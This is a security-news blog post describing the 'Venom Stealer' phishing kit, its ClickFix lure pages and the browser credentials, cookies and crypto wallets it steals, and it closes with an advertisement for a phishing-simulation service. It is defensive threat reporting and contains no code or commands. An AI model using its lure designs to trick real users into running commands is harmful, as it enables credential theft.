Latest Phishing Kit Runs ClickFix Attacks

Latest Phishing Kit Runs ClickFix AttacksResearchers, BlackFog

Threat actors can automate ClickFix attacks with a new cheap phishing kit called "Venom Stealer."   “Venom goes beyond credential harvesting, which sets it apart from commodity thieves like Lumma, Vidar, and RedLine.”   It integrates ClickFix social engineering straight into the operator panel, automates all further steps following initial access, and establishes an ongoing exfiltration pipeline that continues after the original payload is completed. With a validated application process, Telegram-based licensing, and a 15% affiliate program, the developer, going by the handle "VenomStealer," offers access as a subscription ($250/month to $1,800 lifetime).

 

ClickFix is a social engineering technique that deceives people into running harmful commands on their computer, which typically leads to the installation of malware.

 

Because ClickFix attacks are user-initiated, they are more likely to avoid detection by security measures.

Researchers

“When a target lands on an operator-hosted ClickFix website, the infection starts.”   “For both Windows and macOS, Venom provides four templates: a phony Cloudflare CAPTCHA, a phony OS update, a phony SSL certificate error, and a phony font install page. Each one requests that the victim launch a Terminal or Run dialog, paste a command, and hit Enter.   The process appears user-initiated and avoids detection logic based on parent-child process linkages because the target starts the execution itself.”

 

After the virus is installed, it quickly searches the computer for private data and transmits it to the attackers.

What happens?

1. As soon as the payload launches, it scans all of the computer's Chromium and Firefox-based browsers, retrieving saved passwords, session cookies, browsing history, autofill information, and cryptocurrency wallet vaults from each profile.
2. A silent privilege escalation is used to get around Chrome's v10 and v20 password encryption, extracting the decryption key without causing a UAC pop-up and leaving no forensic evidence.
3. Along with the credentials, system fingerprinting and browser extension inventories are recorded, providing fraudsters with a comprehensive picture of every target.

Conclusion

Now that we have talked about the Latest Phishing Kit Runs, ClickFix Attacks, you might want to learn how you can secure yourself against such attacks. For that, you can get in contact with Craw Security, offering a dedicated phishing simulation platform "PhishNext" that gives you the experience of real-life phishing attacks and offers you a solution on how you can evade them in time. What are you waiting for? Contact, Now!

 

Popular Blogs in This Category

1. Huge Ransomware Attacks Rise in October 2025 Globally
2. What Is Browser Detection & Response (BDR) in Cybersecurity?
3. Guaranteed Publication in Chrome Web Store with New Malware Kit
4. AI-Enabled Social Engineering Attacks are on the Rise
5. Exposing How Sophisticated a Phishing Campaign is Bypassing M365 MFA
6. How to Detect a Scam or Phishing Email in Just 10 Seconds?
7. Why Do You Need PhishNext? [2026 Updated]
8. Hidden Risks of Non-Compliance: What the Fines Hide?
9. Nation-State Cyber Criminals Using AI to Streamline Targeting
10. Strong vs Weak Passwords: A Complete Path [2026]